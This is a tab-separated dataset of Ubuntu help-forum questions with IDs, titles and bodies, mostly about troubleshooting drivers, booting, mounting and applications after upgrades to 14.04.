451970	ubuntu 14 and nvidia prime error	i have an asus s550cm with an nvidia 635m . i have just install ubuntu 14.04 and prime 6.2 and switch indicator 0.1 to change between my intel and my nvidia chipset and the switch indicator tells me `` sh1 : glx info not found '' when i go on the nvidia x server setting i have nothing about the switch between the 2 chipset . have you some idea ? ?
451971	skype installation in ubuntu12.04	if i installed error is showing.. varmuk @ ubuntu : ~ $ sudo dpkg -i skype-ubuntu-precise_4.2.0.11-1_i386.deb [ sudo ] password for varmuk : dpkg : error processing skype-ubuntu-precise_4.2.0.11-1_i386.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : skype-ubuntu-precise_4.2.0.11-1_i386.deb
451978	why are .mp3 audio files popping & crackling ?	when i try to play an .mp3 file i get continuous popping & crackling . if i play a video with audio , all works fine . i also have this problem playing you tube videos online . is this a known issue and is there a fix ? here is the sound card i have : *-multimedia description : audio device product : nm10/ich7 family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:45 memory : f9000000-f9003fff thanks edit : found the solution a possible solution is disabling `` auto-mute '' in alsamixer . it is used when the `` switch-to-headphone-and-back-again '' bug occurs ( in high volumes mainly ) . first , open your terminal , or press ctrl+alt+t then , type the command below and hit enter : alsamixer you will get something like this : now press the respective arrow key ( - > or < - ) till you find auto mute option and disable it . crackling will now disappear .
451979	install specific nvidia driver	i have a problem there , before ubuntu 14.04 i was able to install the old nvidia-319 , they work the best with minecraft using shadermod . now when i type sudo apt-get install nvidia-319 it installs nvidia-319 , but after that nvidia-337 , how can i exclude nvidia-337 from installation ?
451987	how do i put my executable file on desktop	i downloaded a linux version of keepersecurity app and followed the setup instructions installation instructions : create a folder to put the app $ mkdir keeperdesktop extract keeperdesktoplinux.zip $ unzip keeperdesktoplinux.zip run it $ java -d32 -xms256m -xmx1g -jar keeperdesktop.jar the parameter -d32 tells the java vm to utilize the 32-bit version . this speeds up the encryption performance by 10x . the second and third parameters tell the java vm how much memory to allocate and allow for the application you can adjust these params as you see fit for your system 's setup . after you launch keeper , you 'll find a new folder in your home directory , i.e . : /home/ < username > /keeperdata . if you want to create an executable shell script then just make it look like this : cd `` install folder '' java -d32 -xms256m -xmx1g -jar keeperdesktop.jar i can run the app by navigating to appropriate folder , and select 'run ' from the popup . what i would like to do is put the startup file on my desktop , or launcher preferrably with the app 's icon . what i did next - ; i followed the suggestions made and i created a .desktop file , saved it in usr/share/applications . the .desktop file looks like this- ; [ desktop entry ] name=keeper type=application exec=keeper/keeper-start terminal=false icon= ( i can not find location of icon file ) comment=keepersecurity datavault nodisplay=false categories=applications name [ en ] =adt.desktop the executable shell file 'keeper-start ' is- ; # ! /bin/bash java -xms256m -xmx1g -jar keeperdesktop.jar as it stands i can get the adt.desktop file in dash , and drag and drop to the launcher-but it wo n't start keeper . i 'm hoping someone could tell me what process/procedure i am missing . thanks - david
451991	windows control buttons problem	i have tried to move windows control buttons using gconf-editor . it worked partially ; now when windows are not maximied x/minimize/maximize buttons are on the right side , but as soon as the windows are maximized it goes back to right . what should i do ? thanks
451992	nvidia upgrade , no opencl	have been running boinc with a geforce gts450 gpu for some time under earlier ubuntu versions and and has always run opencl flawlessly . i 've just done an online upgrade to 14.04 and now boinc log tells me `` ... needs opencl but gpu does n't support it '' . same result with darktable . driver version is 304.117 . anyone know the reason why this should suddenly happen , or how it can be fixed ? just to be clear , the upgrade is all i 've done , i have n't changed anything else .
451995	how we can copy one file from one server to other in cron	can anybody let me know how we can copy a file from one server to another in a cron . i know about scp but how we use it in a cron , since we need to pass the password . edited i found this link expect script that enters a username and password can anybody help me to do like this . i 'm extremely new to ubuntu ,
451997	reliance 3g dongle	i am very frustrated with this problem that i am tired to connect my 'reliance 3g- huawei e173 dongle ' to ubuntu ( 12.10 ) but its not detected on the system . i have just install ubuntu on my lappy and the i have updated it already but every time i connect a dongle its not detected . here i have done all possible attempt but no find any solution . there are many suggestion here for dongle but very few for reliance 3g- huawei e173 dongle that not work for me . please help me , thanks in advance
451999	error executing xilinx ise design suite .bin file	i 'm trying to execute a .bin file , specifically `` xilinx ise design suite '' , and i get this error message : ./xsetup : 12 : [ : 64 : unexpected operator ./xsetup : 37 : [ : unexpected operator ./xsetup : 23 : ./xsetup : /tmp/selfgz10129/tps/lnx32/jre/bin/java : not found what can i do to fix this ? thanks in advance
452000	ubuntu server 14.04 on old macpro	there is a way to run ubuntu server 14.04 on an old macpro with efi 32bit ? there is support in ubuntu 14.04 for 32 bit efi ? thanks
452001	search mounted drives from dash	i 've a number of partitions on different drives mounted automatically on startup through /media/myusername/partition however when i search in the dash none of them appear in the results . is there something i need to do to start seeing the results ?
452006	precise to trusty upgrade ? no notification so far	i checked the settings of my update manager ( cf picture below ) , but i have received no notification so far for trusty , i was wondering if this was normal , or if i would have to install it manually ? edit if i change my settings to `` any new version '' i get a notification for 12.10 . i do n't really want to run four upgrades to get to the current version though ... edit 2 this link is very useful to understand the upgrade on ubuntu . the answer is basically that there wo n't be any notification until the first point release ( 14.04.1 ) , but users who wish to bypass this and install the new lts without having to wait can run sudo update-manager -d. remember to backup your system beforehand to protect your data against screwups .
452009	in installing ubuntu facing problem with following message `` serious errors were found while checking the disk drive for / ''	as i installed latest ubuntu 14.04 in my windows 7 'd ' drive after reboot it showing following message serious errors were found while checking the disk drive for / . i re installed ubuntu for confirmation but still facing same problem . what to do now ? ?
452010	edit or add to gimp 's default templates	in gimp under file - > new menu , we have a preset number and resolutions of templates . see image below : i 'm looking for a way to add new image sizes and resolutions to this list . i have already tried editing my ~/.gimp-2.8/templaterc file but that had no effect . even editing the global one in /etc/gimp/2.0/ had no effect either . then there is a warning on the ~.gimp-2.8 templaterc file : `` this file will be entirely rewritten each time you exit . '' how can i achieve this in gimp 2.8 ?
452013	can not boot from usb install ( hp dv6 )	i have installed ubuntu ( 12.04 and 14.04 separately , multiple times each ) onto a 32gb usb flash drive . the flash drive boots fine on a spare laptop ( older hp dv7 , windows 7 ) , however on my hp dv6-6b04tx ( windows 8 ) it hangs on an empty black screen ( with back-light on ) straight after my bios splash screen . if i hold down the shift key on boot it gets stuck on a black screen with the text 'grub loading . ' and nothing else . these screens never change until i reboot . in both cases ( empty black screen and loading grub ) the fan spins at max speed . i have previously installed ubuntu onto the internal ssd hdd and it booted fine , a live usb also boots fine . i am installing ubuntu with a /boot partition and a separate partition for / , both ext2 . i first attempted to create the root partition as encrypted however the same problem occurs with an unencrypted root partition . i have updated the grub config to remove quiet splash so that i would hopefully get some error output however this changed nothing ( still loads empty black screen/stuck on 'grub loading. ' ) . i found many people with similar issues on hp laptops with switchable graphics ( ati raedon 6770m & intel hd4000 ) so i followed some advice to load grub in text mode , and to disable the ati card ( using vgaswictheroo ) - again this changed nothing . any help would be greatly appreciated . update : i have now also tried setting grub config to use nomodeset and acpi_osi= , again no change
452019	how to trigger for some action on package upgrade ?	i 've got some problems . i have vga passthrough setup on my desktop . and i had to apply some patches to kernel and nvidia driver . now i 've got custom patched kernel installed and patched nvidia driver . when new kernel arrives to repository it replaces my patched one . same story with nvidia drivers . is there any way to trigger some action while upgrading certain package via apt ?
452020	virtualbox , mounting ubuntu 12.04 on windows 7	i am trying to start ubuntu 64x with vm on windows 7 . i get this message when i start the system : everything seems to be ok with the settings . i am using a vdi image . what can i try to do for solve the problem ? this is the result when i run 'cat /etc/fstab ' :
452022	remastersys alternative	i was using remastersys on 12.04 to backup all my programs and settings and in that way , i was able to install it on many systems . now i am using ubuntu 14.04 and i added precise deb ppa to software sources . synaptic told me to downgrade some packages . should i do it or avoid it ? other programs like relinux , uck , manual options does n't suit me . i am looking for a straight forward method like remastersys . one option i found is debian builder but it is not available for 14.04 , i didn ; t try black lab image creator and there is no gui for it . anybody please suggest me a effective , easy way to back all my settings and packages , so i do n't need to download them again and again , apt on cd is still available ? ?
452025	why are my x server configurations not taken into account ?	i know questions like that have been asked many times but i ca n't find a way to solve my problem even after reading them and trying the answers . i have two screens on my desktop . whatever i set to the /etc/x11/xorg.conf or to the /usr/share/x11/xorg.conf.d/xorg.conf files , this is how my desktop looks like when i log in ( which is wrong because the wallpaper should cover the whole background on the right side ) : then i start nvidia-settings and when i change from this : to this : and apply it , my desktop looks like this : which makes absolutely no sense at all to me , because i have n't touched the main screen 's resolution . i ca n't find a way to make x11 remember to put the small screen on the right of the big neither , nor keep the big screen as the main screen . i have tried multiple configuration files including this : section `` screen '' # removed option `` nvidiaxineramainfoorder '' `` dfp-0 '' # removed option `` metamodes '' `` dvi-i-2 : nvidia-auto-select @ 1920x1080 +1280+0 , dvi-i-1 : nvidia-auto-select @ 1280x1024 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-2 '' option `` metamodes '' `` crt-0 : nvidia-auto-select @ 1280x1024+1920+0 , dfp-2 : nvidia-auto-select @ 1920x1080+0+0 '' subsection `` display '' depth 24 endsubsection endsection this issue appeared when i switched to 13.10 . i have just switched to 14.04 but it has n't improved anything . my gpu is an nvidia gts 450 . anyone has a clue on how to solve this please ? edit : output of xrandr : screen 0 : minimum 8 x 8 , current 3200 x 1080 , maximum 16384 x 16384 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 connected primary 1280x1024+0+0 ( normal left inverted right x axis y axis ) 338mm x 270mm 1280x1024 60.0*+ 75.0 1280x960 75.0 70.0 60.0 1152x864 75.0 70.0 60.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 640x480 75.0 72.8 59.9 dvi-i-2 connected 1920x1080+1280+0 ( normal left inverted right x axis y axis ) 510mm x 290mm 1920x1080 59.9*+ 60.0 1680x1050 60.0 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.0 60.0 800x600 75.0 60.3 56.2 640x480 75.0 59.9 hdmi-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-3 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 should be on the right , dvi-i-2 on the left . i have tried option `` metamodes '' `` dvi-i-1 : 1280x1024+1920+56 , dvi-i-2 : 1920x1080+0+0 '' in both /etc/x11/xorg.conf and /usr/share/x11/xorg.conf.d/xorg.conf but the result is still the same at startup .
452026	ca n't open my disk .	i had windows & kali linux ( dual boot ) then i took off kali linux parition so i delete it but i made a mistake ... and pc wo n't boot `` rescue grub error '' or something ... but i installed ubuntu & removed windows and all . all is running fine but i just ca n't open one of my disks , this is the error : error mounting /dev/sdb5 at /media/imad/disque local : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb5 '' `` /media/imad/disque local '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdb5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . thank you
452030	nvidia-settings does not work since upgrade to 14.04	since i upgraded to ubuntu 14.04 from 13.10 , it is impossible to change any parameter in nvidia-settings without this program crashing . nvidia-settings is starting correctly but if i try to change any parameter ( and clicking `` apply '' ) , it will crash with the following message : error : error querying target relations the program 'nvidia-settings ' received an x window system error . this probably reflects a bug in the program . the error was 'badvalue ( integer parameter out of range for operation ) ' . ( details : serial 830 error_code 2 request_code 157 minor_code 25 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) this error happens even when there is no change in configuration ( changing resolution and setting back then clicking apply ) my config : graphics card : geforce gtx 460 dual screen opengl version string : 4.2.0 nvidia 304.117 nvidia-settings : version 331.20 ( buildd @ roseapple ) mon feb 3 15:07:22 utc 2014
452031	ubuntu 14.04 lts release does n't boot after being installed	i used linux live usb creator to make a live disk of ubuntu 14.04 . i booted it up , chose `` something else '' and manually made a 58gb partition and a 4gb swap space . the install seemed to work , and finished fine . but when i boot up into the partition , nothing happens , and it just boots windows ? ? any help would be appreciated , thanks , : - )
452034	no wireless with lubuntu 14.04 and iwconfig shows card twice	i just installed lubuntu 14.04 on a thinkpad t42 ( with forcepae option ) . everything is working fine but wifi . the applet shows only a few of the nearby networks . if my home network shows , it asks for the key , but then does nothing . security is set to wpa as the card can not handle wpa2 . what bothers me is that iwconfig shows two identical wireless cards , one as eth0 and one as wifi0 . iwconfig output is : wifi0 ieee 802.11-ds essid : '' '' mode : managed frequency:2.412 ghz access point : invalid bit rate:11 mb/s tx-power=17 dbm sensitivity=0/65535 retry limit:16 rts thr : off fragment thr : off power management : off link quality=0/100 signal level=-108 dbm noise level=-108 dbm rx invalid nwid:10245 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:84223 missed beacon:0 eth1 ieee 802.11-ds essid : '' '' mode : managed frequency:2.412 ghz access point : invalid bit rate:11 mb/s tx-power=17 dbm sensitivity=0/65535 retry limit:16 rts thr : off fragment thr : off power management : off link quality=0/100 signal level=-108 dbm noise level=-108 dbm rx invalid nwid:10245 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:84223 missed beacon:0 output of lshw -c network is *-network:0 beschreibung : ethernet interface produkt : 82540ep gigabit ethernet controller ( mobile ) hersteller : intel corporation physische id : 1 bus-informationen : pci @ 0000:02:01.0 logischer name : eth0 version : 03 seriennummer : 00:0d:60:79:16:16 größe : 100mbit/s kapazität : 1gbit/s breite : 32 bits takt : 66mhz fähigkeiten : pm bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation konfiguration : autonegotiation=on broadcast=yes driver=e1000 driverversion=7.3.21-k8-napi duplex=full ip=192.168.2.102 latency=64 link=yes mingnt=255 multicast=yes port=twisted pair speed=100mbit/s ressourcen : irq:11 memory : c0220000-c023ffff memory : c0200000-c020ffff ioport:8400 ( größe=64 ) memory : c0240000-c024ffff *-network:1 beschreibung : kabellose verbindung produkt : cisco aironet wireless 802.11b hersteller : cisco aironet wireless communications physische id : 2 bus-informationen : pci @ 0000:02:02.0 logischer name : wifi0 version : 00 seriennummer : 00:0e:9b:40 : db:2c breite : 32 bits takt : 33mhz fähigkeiten : pm vpd bus_master cap_list rom logical wireless ethernet physical konfiguration : broadcast=yes driver=airo latency=64 maxlatency=4 mingnt=4 multicast=yes wireless=ieee 802.11-ds ressourcen : irq:11 ioport:8000 ( größe=256 ) memory : c0214000-c0217fff memory : c0400000-c07fffff memory : c0800000-c09fffff note that the logical name here is wifi0 while the network manager shows eth1 . interestingly , i can scan with iwlist on both of them and see , at least some , nearby networks . i remember that getting drivers for this card in xp was very painful , but it seems to be properly recognized here . using ifconfig , however shows only errors and that is on eth1 so , any ideas what is happening here ?
452040	shared drive fails to mount during startup . if skipped , no problems mounting after login	i have a dual boot configuration with windows 7 and ubuntu 14.04 . i have my ubuntu installed on a portable drive with 2 partitions . the internal disk also has 2 partitions and have windows on it . when i boot , i always get a unable to mount drive message and once i skip , everything works fine and i can mount the drive after login without an error . how can i rectify this ? please help . i have run a few commands # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sdc1 during installation uuid=87ad6d84-e5ae-48a6-8dee-b900aa780fc5 / ext4 errors=remount-ro 0 1 # /windows was on /dev/sdc5 during installation # swap was on /dev/sdc2 during installation uuid=8fbbd9a0-7ef7-4078-a8e2-434040cead96 none swap sw 0 0 uuid=3d58-4fe0 /media/vivek vfat utf8 , umask=007 , gid=46 0 1 /dev/disk/by-uuid/222e918c2e91599d /mnt/222e918c2e91599d auto nosuid , nodev , nofail , x-gvfs-show , noauto 0 0 disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x68000000 device boot start end blocks id system /dev/sda1 2048 419358719 209678336 7 hpfs/ntfs/exfat /dev/sda2 * 419637248 625139711 102751232 7 hpfs/ntfs/exfat disk /dev/sdb : 1000.2 gb , 1000204884480 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525165 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x721e5f28 device boot start end blocks id system /dev/sdb1 * 2048 390625279 195311616 83 linux /dev/sdb2 390625280 398438399 3906560 82 linux swap / solaris /dev/sdb3 398440446 1953523711 777541633 5 extended /dev/sdb5 398440448 1953523711 777541632 7 hpfs/ntfs/exfat
452041	why is my persistence file not increasing ?	i have an ntfs formatted drive with ubuntu 14.04 on it and i 'm trying to increase my persistence file , but no matter what , it wo n't increase . i 've tried this with previous versions of ubuntu as well , but i 'd get errors rather than a failed increase . i 've followed this tutorial . can anyone tell me what i did wrong from the images in these two links ? ( the format of the two images are unsupported for posting here ) : http : //i4.minus.com/jlppdbwbwreeg.png http : //i2.minus.com/jewkwv198x5ze.png
452042	why is my apache not working after upgrading to ubuntu 14.04 ?	[ aman @ aman-inspiron-1440 : ~ $ apache2 [ mon apr 21 17:36:38.019213 2014 ] [ core : warn ] [ pid 4134 ] ah00111 : config variable $ { apache_lock_dir } is not defined [ mon apr 21 17:36:38.019345 2014 ] [ core : warn ] [ pid 4134 ] ah00111 : config variable $ { apache_pid_file } is not defined [ mon apr 21 17:36:38.019370 2014 ] [ core : warn ] [ pid 4134 ] ah00111 : config variable $ { apache_run_user } is not defined [ mon apr 21 17:36:38.019385 2014 ] [ core : warn ] [ pid 4134 ] ah00111 : config variable $ { apache_run_group } is not defined [ mon apr 21 17:36:38.019414 2014 ] [ core : warn ] [ pid 4134 ] ah00111 : config variable $ { apache_log_dir } is not defined [ mon apr 21 17:36:38.028756 2014 ] [ core : warn ] [ pid 4134 ] ah00111 : config variable $ { apache_log_dir } is not defined [ mon apr 21 17:36:38.029032 2014 ] [ core : warn ] [ pid 4134 ] ah00111 : config variable $ { apache_log_dir } is not defined [ mon apr 21 17:36:38.029056 2014 ] [ core : warn ] [ pid 4134 ] ah00111 : config variable $ { apache_log_dir } is not defined ah00526 : syntax error on line 74 of /etc/apache2/apache2.conf : invalid mutex directory in argument file : $ { apache_lock_dir } this is the content of /etc/apache2/apache2.conf file .
452047	league of legends error on ubuntu 14.04	i installed lol on ubuntu 13.10 and it was working properly . now i updated to 14.04 and after update when i want to start the game it exits with error message . reinstall could solve my problem ? or what should i do with it ? i can post the error details if needed .
452048	why are my user accounts missing from login screen after upgrade to 14.04 from 12.04 ?	upgraded my 12.04lts to 14.04 lts via dvd , choosing the `` upgrade '' option from the installation options prompt . since then , in the login screen , the older user accounts are not visible . they are however visible if i navigate to the home screen . those are protected and even as admin below is the output of grep /bin/bash /etc/passwd : root : x:0:0 : root : /root : /bin/bash admin1 : x:1000:1000 : admin , , , :/home/admin1 : /bin/bash dranand : x:1001:1001 : anand philip , , , :/home/dranand : /bin/bash here is the output of ls -l /home . ( the new profiles i have created during the upgrade are marked . ) drwx -- -- -- 18 admin1 admin1 4096 apr 21 17:35 admin1 [ new ] drwxr-xr-x 21 1004 1004 4096 apr 11 12:48 dmishariff [ old ] drwxr-xr-x 2 dranand dranand 4096 apr 21 16:58 dranand [ new ] drwxr-xr-x 36 1002 1002 4096 apr 21 16:15 dranandphilip [ old ] drwxr-xr-x 28 admin1 admin1 4096 apr 15 16:07 nationwide [ old ] how do i solve this ?
452050	mail app with some features	i 'm looking for mail app , which can : minimize to tray show notifications autostart minimized display letters as chains any ideas ? i 've tried thunderbird , but chains looking bad and for tray i need to install an extension .
452051	skype crashes in ubuntu 14.04	i have problem with skype in ubuntu 14.04 probably it has something to do with this bug i have installed skype in ubuntu 14.04 and when i use my logitech webcam for a video call , ubuntu freezes and i can no longer see dash or any panel ( probably x crashes ) . i do n't have installed any additional drivers and skype was working ok until ubuntu 13.10 so there is something wrong with libraries or skype itself.. it also happens when i 'm watching a youtube video . also , this is my first bug report and i do n't really know what error log to send , please tell me what to post here thanks..
452054	firefox : control shift t shortcut does not work since upgrade to 14.04	since upgrade to ubuntu 14.04 from 13.10 , the control-shift-t shortcut allowing to bring back latest deleted tabs in firefox does not work anymore . my keyboard configuration is latin-be . this is my version of firefox ( same in help- > about firefox ) : $ sudo apt-cache policy firefox installé : 28.0+build2-0ubuntu2 candidat : 28.0+build2-0ubuntu2 table de version : *** 28.0+build2-0ubuntu2 0 500 http : //be.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status this problem is not happening on another machine with the same keyboard layout . i suspect the problem is that the upgrade failed and could not complete some tasks at the end of the upgrade . is there some way to finish the upgrade ? everything else seems fine and dpkg -- configure -a returns nothing .
452058	what is the current status of the x32 abi implementation in ubuntu as of 14.04 ?	the 14.04 release notes contain the following sentence : x32 abi support ( 64-bit mode with 32-bit pointers ) was also introduced . i think this deserves a bit more explanation . when you use a search engine to find out more about `` x32 abi '' , you may find a wikipedia article at best , but mostly phoronix and slashdot , which do n't seem to be very useful . i 'd like to see some insightful answers on : how or what of x32 abi is currently implemented in 14.04 ? is it enabled by default in 14.04 64-bit or are there any additional steps needed to setup x32 abi ? what components or what software can use x32 abi ? are there actual benefits on a machine/installation running x32 abi ? how is the memory consumption in comparison with default 32-bit and 64-bit installations ? ideally the x32 abi should have brought the best of both worlds together : most of the speed improvements of x86-64 and lower memory consumption for users on older 64-bit capable hardware that did n't have a lot of ram . ( i remember selling a kit of used ddr2 ram for 3x the price i bought it a few years ago , but ddr2 ram seems be affordable again . )
452064	how to view berkeley db contents ?	i have a copy of addressbook from nokia n900 and it 's a berkeley db file . how can i view it 's contents ? $ file addressbook.db addressbook.db : berkeley db ( hash , version 8 , native byte-order )
452065	ubuntu 14.04 login screen ui issue	i upgraded ubuntu 12.04 lts to 14.04 lts . i failed to upgrade first time and then i logged into terminal using ctrl+alt+f1 and used the following command to upgrade sudo apt-get dist-upgrade and i was able to upgrade to 14.04 lts but i am experiencing some issues with my login scren ui . not sure how to fix . tried sudo dpkg-reconfigure lightdm but no luck : ( attached is the screen shot of the same . added : contents of /usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf gnu nano 2.2.6 file : 50-ubuntu.conf [ seatdefaults ] user-session=ubuntu
452070	what is vmlinuz file on live ubuntu ?	i use ubuntu 14.04 live on flash . in my computer directory there is a file name vmlinuz what is this file ? i did not have that on my 12.04 on hard derive .
452071	why disable fast boot on windows 8 when having dual booting ?	why is everybody keep mentioning to disable fast boot on windows 8 if you have installed alongside ubuntu ? is it something that is recommended only for uefi machines or is it a suggestion for legacy bios machines as well ? is it because it makes the windows partition inaccessible from linux or there is another more serious reason to disable it ?
452073	ca n't complete installation of 12.04 on new partition dual boot with win xp	following message after installation failed . `` completing the ubuntu installation . for more installation boot options , press ‘esc’ now… busybox v1.18.5 ( ubuntu 1:1.18.5 – 1ubuntu4.1 ) built-in shell ( ash ) entre ‘help’ for a list of built-in commands . ( initramfs ) unable to find a medium containing a live file . '' please can anyone advise this novice how to get the dual boot ubuntu 12.04 working with xp . on starting i get the option of win xp or ubuntu , but have to use an old ps/2 connected keyboard to select the os . if i select ubuntu i see the above message and it hangs . if i select the windows xp option it starts xp as normal . i found that the partition i installed ubuntu 12.04 no longer is listed in windows . i tried doing a system restore in windows . it looked like it was working until a message of regret that no changes had been made as requested . i used the instructions shown in computer active issue 420 2-15 april 2014 to set up the dual boot . i selected 'ext4 and mount point'/'and selected the spare partition . can anyone help this 70 year old please ?
452074	creation of multiple vm 's on xen	i have created a vm running on xen . how can i create multiple vm 's on xen ? the vm is running ubuntu and a hadoop application on it .
452078	installing ubuntu 14.04	i want to install ubuntu 14.04 on my new laptop , but when i download 64 bit desktop version . from ubuntu site the iso file is `` ubuntu-14.04-desktop-amd64 '' , is that ok ? i have intel i-7 processor .
452079	using kde - application menus missing in qt apps	i have multiple desktop environments installed on my ubuntu 14.04 installation , and am primarily using kde ( today ) . here 's the problem i 've noticed . when i 've been building some newer versions of qt-based applications from their git repos , specifically qt creator and tiled , everything builds fine . however , when i run the compiled program , there are no application menus in their window . i do not see this same problem when using older , pre-packaged debs for the same applications . i 've completely removed/tested/re-installed appmenu-qt to no avail . i 've checked the application config files , and find no menubar entries . i even added/tested menubar=true and menubar=enabled , with no change . and , like i said , the prepackaged versions showed their menus - so this should n't be the problem anyway . if i change the application appearance | style | fine tuning settings for the menubar style to be a top screen menubar or titlebar button menu , i can see and access the menu as expected . when i change the setting back to `` in application '' , the menus are gone again . i have all the prerequisite qt dev libraries installed , and received no errors or warnings when configuring/qmaking or compiling the apps . does anyone have any idea why the appmenus would n't be showing up in the application window ?
452082	what to do after creating bootable usb	for the first time i have installed ubuntu on my laptop but when i booted my laptop it was not showing options to select between the two os i.e i have installed windows8 on laptop and created bootable usb stick for ubuntu and then restarted my computer and changed boot device to usb and selected to use first device ( hdd ) for getting it started ( linux ) then i connected to internet , would it automatically upload any of my document from hdd ? ? ? ? ? how to install various software ( application ) to ubuntu like vlc , etc .
452083	how to install kde along unity ?	i have just installed the latest ubuntu 14.04 and i would like to install kde along side my gnome/unity that i have now . how can i do this ? thanks !
452084	unable to run windows and ubuntu in single mode	to start from beginning , i brought a laptop with pre-installed windows 8. later updated to 8.1 . but i love ubuntu very much . previously , i tried installing earlier versions of ubuntu . it had problem to even start up . so , i lost hope . recently , i tried ubuntu 14.04 . to my luck , i installed it successfully . updated all the plugins and everything is fine . but my problem is , when legacy is selected , only ubuntu runs and i cant find windows in menu . when i select uefi , directly boots to windows , but no ubuntu . i always have to go to bios settings and change every time to change to other os . is there a way , so that i need not always go to bios setting , and can find both ubuntu and windows in a single mode ? thanks in advance .
452091	installing ubuntu with `` something else ''	after having some trouble with ubuntu installation , i think i 've finally figured out what needs to be done . my system 's current partition setup is like this : system 200mb primary , c : 670gb primary , 28gb unallocated ( for ubuntu ) , and hp_tools 100mb primary . so here 's what i 'm going to try to do . in ubuntu installation with the `` something else '' option i will create a primary ext4 ( or 3 ? ) partition out of the 28gb of free space . then , since i now have four primary partitions , i will create a logical 4gb swap area inside the ext4 ( or 3 ? ) area . so the end result should be that along with the system , c : , etc . i will have a 24gb partition for ubuntu and inside that a 4gb logical swap partition . will this work ?
452094	accessing menus in rhythmbox on gnome	i have two machines running ubuntu - one has gnome ubuntu , the other xubuntu . both have been recently upgraded to 14.04 . on xubuntu , rhythmbox has both a menu and a sort of `` settings '' button on the upper right-hand side . on gnome ubuntu ( since either 13.10 or 13.04 ) neither is visible - and , in fact , i do n't know how to access the things that used to be there . for example , i do n't know how to change the layout or install plugins . how do i access this functionality in gnome ? i 've attached screenshots of rhythmbox in both desktops . rhythmbox on xubuntu rhythmbox on gnome ubuntu
452097	problem with tasksel in ubuntu 14.04	i tried to install lamp server using this command : sudo tasksel install lamp-server but i always get this error : ca n't call method `` set '' on an undefined value at /usr/share/perl5/debconf/frontend.pm line 126 , < gen0 > line 5 . use of uninitialized value $ ret in scalar chomp at /usr/share/perl5/debconf/client/confmodule.pm line 132 , < stdin > line 4 . use of uninitialized value $ ret in split at /usr/share/perl5/debconf/client/confmodule.pm line 133 , < stdin > line 4 . use of uninitialized value $ ret [ 0 ] in string eq at /usr/share/perl5/debconf/client/confmodule.pm line 134 , < stdin > line 4 . use of uninitialized value $ ret [ 0 ] in string eq at /usr/bin/debconf-apt-progress line 173 , < stdin > line 4. tasksel : aptitude failed ( 255 ) i tried to reinstall tasksel but with no luck
452098	no keyboard input after 'caps lock ' press	i live in russia so i have russian and english keyboard layout enabled on my kubuntu 14.04 desktop . i use 'caps lock ' and 'alt+shift ' shortcuts to change layout it worked fine , but today my boss told me to install chinese layout to test something . i used ibus to setup chinese layout and use it . after it - i deleted all chinese data in regional setting including dbus layout - and after this i can not use 'caps lock ' at all - after i press on this button keyboard send no input to controls not only it does n't switch layout , after i disabled 'caps lock ' for switching layout - problem is the same - i simply can not input any text while caps lock is enabled . i have no idea how to investigate this problem and find starting point
452100	chromium not remembering all tabs and running slow	i 've installed ubuntu 14.04 64 bit and chromium 34.0.1847.116 ubuntu 14.04 aura ( 260972 ) . i 've noticed a few problems ... 1 ) despite having the setting `` continue where you left off '' checked , only some of the tabs are reopened when i start up chromium . i typically have about 10 tabs open when i close chromium so i ca n't see that being some limit - has n't been a problem in the past . 2 ) if i right click a link and open in a new window , that window can take up to a minute to load the page and once loaded , runs sluggishly ( scrolling is slow or if a youtube video , runs as though i 've got poor bandwidth ) . i 've removed chromium ( apt-get purge ) and then also removed the directories ~/.cache/chromium and ~/.config/chromium and then did a reinstall of chromium but to no avail . interestingly after running what should be a clean chromium , i hit ctrl + h and all my browser history was there ... fwiw , i also tried changing video drivers - switching from nouveau to nvidia ( all three versions which available to me ) and the problem persists . i finally decided to reinstall 14.04 and the problem returns . i 've got the pepper flash plugin installed so i do n't know if that has something to do with this , although this is the first time i 've ( knowingly ) installed this plugin . i 've never had this problem on 13.10 with chromium and have had no problems with firefox . i also have the webmail ad blocker plugin installed but that 's never given me trouble in the past either . any one else having a similar issue ? any ideas on what to try next ... ? update : i 've reported a bug https : //bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1310849 thanks in advance , bernard .
